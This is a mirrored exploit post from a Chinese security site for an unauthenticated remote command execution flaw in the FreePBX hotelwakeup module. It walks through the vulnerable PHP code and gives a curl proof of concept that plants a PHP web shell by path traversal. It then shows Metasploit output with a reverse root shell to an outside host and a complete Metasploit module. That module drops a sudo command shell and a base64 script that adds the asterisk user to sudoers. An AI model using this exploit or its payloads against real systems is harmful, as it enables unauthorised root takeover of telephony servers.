首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FreePBX < 13.0.188 - Remote Command Execution (Metasploit)
来源:0x4148@gmail.com 作者:0x4148 发布时间:2016-09-28  
#Title : Freepbx < 13.0.188 , Remote root exploit
#Vulnerable software : Freepbx < 13.0.188
#Author : Ahmed Sultan (0x4148)
#Email : 0x4148@gmail.com
#Current software status : patch released
#Vendor : Sangoma <freepbx.org>
 
=begin
Freepbx 13.x are vulnerable to Remote command execution due to the insuffecient sanitization of the user input fields language,destination and also due to the lack of good authentication checking
Technical details
Vulnerable file : admin/modules/hotelwakeup/Hotelwakeup.class.php
Line 102 :
    public function generateCallFile($foo) {
       ...............................
        if (empty($foo['filename'])) {
            $foo['filename'] = "wuc.".$foo['time'].".ext.".$foo['ext'].".call"; <<<<<---------------------Vulnerable
        }
        ...........................
        // Delete any old .call file with the same name as the one we are creating.
        if(file_exists($outfile) ) {
            unlink($outfile);
        }
        // Create up a .call file, write and close
        $wuc = fopen($tempfile, 'w');
        fputs( $wuc, "channel: Local/".$foo['ext']."@originate-skipvm\n" );
        fputs( $wuc, "maxretries: ".$foo['maxretries']."\n");
        fputs( $wuc, "retrytime: ".$foo['retrytime']."\n");
        fputs( $wuc, "waittime: ".$foo['waittime']."\n");
        fputs( $wuc, "callerid: ".$foo['callerid']."\n");
        fputs( $wuc, 'set: CHANNEL(language)='.$foo['language']."\n");  <<<<<---------------------Vulnerable
        fputs( $wuc, "application: ".$foo['application']."\n");
        fputs( $wuc, "data: ".$foo['data']."\n");
        fclose( $wuc );
        ..........................
The ext value can be manipulated by the attacker to change the output file path
the language value can be manipulated by the attacket to load in malicious contents
Function is called at
Line 94 :
    public function addWakeup($destination, $time, $lang) {
        $date = $this->getConfig();  // module config provided by user
        $this->generateCallFile(array(
            "time"  => $time,
            "date" => 'unused',
            "ext" => $destination, <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<================ Vulnerable [Filename field]
            "language" => $lang, <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<================ Vulnerable [language field loaded with malicious code]
            "maxretries" => $date['maxretries'],
            "retrytime" => $date['retrytime'],
            "waittime" => $date['waittime'],
            "callerid" => $date['cnam']." <".$date['cid'].">",
            "application" => 'AGI',
            "data" => 'wakeconfirm.php',
        ));
    }
addWakeup function is called when calling the hotelwakeup module via ajax.php and setting savecall as command
Line 60 :
            switch($_REQUEST['command']) {
            case "savecall":
                if(empty($_POST['language'])) {
                    $lang = 'en'; //default to English if empty
                } else {
                    $lang = $_POST['language']; <<<<<<<<<<<<<<<<<<<===========================
                }
            ............................................
                if ($badtime)  {
                    // abandon .call file creation and pop up a js alert to the user
                    return array("status" => false, "message" => sprintf(_("Cannot schedule the call the scheduled time is in the past. [Time now: %s] [Wakeup Time: %s]"),date(DATE_RFC2822,$time_now),date(DATE_RFC2822,$time_wakeup)));
                } else {
                    $this->addWakeup($_POST['destination'],$time_wakeup,$lang); <<<<<<<<<<<=======================
                    return array("status" => true);
                }
           .................................
POC :
[0x4148:/lab]# curl "http://68.170.92.50:8080/admin/ajax.php" -H "Host: 68.170.92.50:8080" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "Accept-Language: en-US,en;q=0.5" --compressed -H "Referer: http://68.170.92.50:8080/admin/ajax.php" -H "Cookie: lang=en_US; PHPSESSID=9sfgl5leajk74buajm0re2i014" -H "Connection: keep-alive" -H "Upgrade-Insecure-Requests: 1" --data "module=hotelwakeup&command=savecall&day=now&time="%"2B1 week&destination=/../../../../../../var/www/html/0x4148.php&language=<?php system('uname -a;id');?>"
{"error":{"type":"Whoops\\Exception\\ErrorException","message":"touch(): Unable to create file \/var\/spool\/asterisk\/tmp\/wuc.1475613328.ext.\/..\/..\/..\/..\/..\/..\/var\/www\/html\/0x4148.php.call because No such file or directory","file":"\/var\/www\/html\/admin\/modules\/hotelwakeup\/Hotelwakeup.class.php","line":238}}#   
 
The error mean nothing , we still can get our malicious file via http://server:port/0x4148.php.call
the server will ignore.call extn and will execute the php
 
[0x4148:/lab]# curl "http://68.170.92.50:8080/0x4148.php.call"
channel: Local//../../../../../../var/www/html/0x4148.php@originate-skipvm
maxretries: 3
retrytime: 60
waittime: 60
callerid: Wake Up Calls <*68>
set: CHANNEL(language)=Linux HOUPBX 2.6.32-504.8.1.el6.x86_64 #1 SMP Wed Jan 28 21:11:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
uid=499(asterisk) gid=498(asterisk) groups=498(asterisk)
application: AGI
data: wakeconfirm.php
 
Privelage can be escalated via adding the asterisk user to sudoers which can be done manually
then echo a > /var/spool/asterisk/sysadmin/amportal_restart
sleeping for few seconds
then sudo bash -i
 
MSF OUTPUT
msf > use exploit/fpbx
msf exploit(fpbx) > set RHOST 68.170.92.50
RHOST => 68.170.92.50
msf exploit(fpbx) > set RPORT 8080
RPORT => 8080
msf exploit(fpbx) > exploit
 
[*] [2016.09.27-16:39:21] Started reverse TCP handler on 88.150.231.125:443
[*] [2016.09.27-16:39:21] 68.170.92.50:8080 - Sending payload . . .
[*] [2016.09.27-16:39:21] 68.170.92.50:8080 - Trying to execute payload
[+] [2016.09.27-16:39:41] 68.170.92.50:8080 - Payload executed
[*] [2016.09.27-16:39:41] 68.170.92.50:8080 - Spawning root shell <taking around 20 seconds in case of success>
 
id
uid=0(root) gid=0(root) groups=0(root)
sh -i
sh: no job control in this shell
sh-4.1# pwd
pwd
/var/www/html
sh-4.1# whoami
whoami
root
sh-4.1#
=end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
                      'Name'            => 'FreePBX < 13.0.188.1 Remote root exploit',
                      'Description'     => '
                        This module exploits an unauthenticated remote command execution in FreePBX module Hotelwakeup
                      ',
                      'License'         => MSF_LICENSE,
                      'Author'          =>
                        [
                          'Ahmed sultan (0x4148) <0x4148@gmail.com>', # discovery of vulnerability and msf module
                        ],
                      'References'      =>
                        [
                          "NA"
                        ],
                      'Payload' =>
                        {
                          'Compat' =>
                          {
                            'PayloadType'  => 'cmd',
                            'RequiredCmd'  => 'perl telnet python'
                          }
                        },
                      'Platform'       => %w(linux unix),
                      'Arch'           => ARCH_CMD,
                      'Targets'        => [['Automatic', {}]],
                      'Privileged'     => 'false',
                      'DefaultTarget'  => 0,
                      'DisclosureDate' => 'Sep 27 2016'))
  end
 
  def print_status(msg = '')
    super("#{rhost}:#{rport} - #{msg}")
  end
 
  def print_error(msg = '')
    super("#{rhost}:#{rport} - #{msg}")
  end
 
  def print_good(msg = '')
    super("#{rhost}:#{rport} - #{msg}")
  end
 
  # Application Check
  def check
    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'admin', 'ajax.php'),
      'headers' => {
        'Referer' => "http://#{datastore['RHOST']}/jnk0x4148stuff"
      },
      'vars_post' => {
        'module' => 'hotelwakeup',
        'command'       => 'savecall'
      }
    )
 
    unless res
      vprint_error('Connection timed out.')
    end
    if res.body.include? "Referrer"
      vprint_good("Hotelwakeup module detected")
      return Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end
  def exploit
    vprint_status('Sending payload . . .')
    pwn = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'admin', 'ajax.php'),
      'headers' => {
        'Referer' => "http://#{datastore['RHOST']}:#{datastore['RPORT']}/admin/ajax.php?module=hotelwakeup&action=savecall",
        'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        'User-agent' => "mostahter ;)"
      },
      'vars_post' => {
        'module' => 'hotelwakeup',
        'command'       => 'savecall',
        'day'       => 'now',
        'time'       => '+1 week',
        'destination'       => '/../../../../../../var/www/html/0x4148.php',
        'language'       => '<?php echo "0x4148@r1z";if($_GET[\'r1zcmd\']!=\'\'){system("sudo ".$_GET[\'r1zcmd\']);}else{fwrite(fopen("0x4148.py","w+"),base64_decode("IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCmltcG9ydCBvcwppbXBvcnQgdGltZQojIC0qLSBjb2Rpbmc6IHV0Zi04IC0qLSAKY21kID0gJ3NlZCAtaSBcJ3MvQ29tIEluYy4vQ29tIEluYy5cXG5lY2hvICJhc3RlcmlzayBBTEw9XChBTExcKVwgICcgXAoJJ05PUEFTU1dEXDpBTEwiXD5cPlwvZXRjXC9zdWRvZXJzL2dcJyAvdmFyL2xpYi8nIFwKCSdhc3Rlcmlzay9iaW4vZnJlZXBieF9lbmdpbmUnCm9zLnN5c3RlbShjbWQpCm9zLnN5c3RlbSgnZWNobyBhID4gL3Zhci9zcG9vbC9hc3Rlcmlzay9zeXNhZG1pbi9hbXBvcnRhbF9yZXN0YXJ0JykKdGltZS5zbGVlcCgyMCk="));system("python 0x4148.py");}?>',
      }
    )
    #vprint_status("#{pwn}")
    vprint_status('Trying to execute payload <taking around 20 seconds in case of success>')
    escalate = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, '0x4148.php.call'),
      'vars_get' => {
        '0x4148' => "r1z"
      }
    )
    if escalate.body.include? "0x4148@r1z"
        vprint_good("Payload executed")
        vprint_status("Spawning root shell")
        killit = send_request_cgi(
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path, '0x4148.php.call'),
          'vars_get' => {
            'r1zcmd' => "#{payload.encoded}"
          }
        )      
    else
        vprint_error("Exploitation Failed")
    end
    end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel 4.6.3 Netfilter P
·VLC Media Player 2.2.1 - Buffe
·Android Stagefright MP4 tx3g I
·KeepNote 0.7.8 - Command Execu
·Metasploit Web UI Static secre
·Grandsteam GXV3611_HD - SQL In
·Metasploit Web UI - Diagnostic
·DWebPro 8.4.2 - Multiple Vulne
·Kerberos in Microsoft Windows
·Apache Tomcat 8/7/6 (Debian-Ba
·Microsoft Internet Explorer 11
·Street Fighter 5 - 'Capcom.sys
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved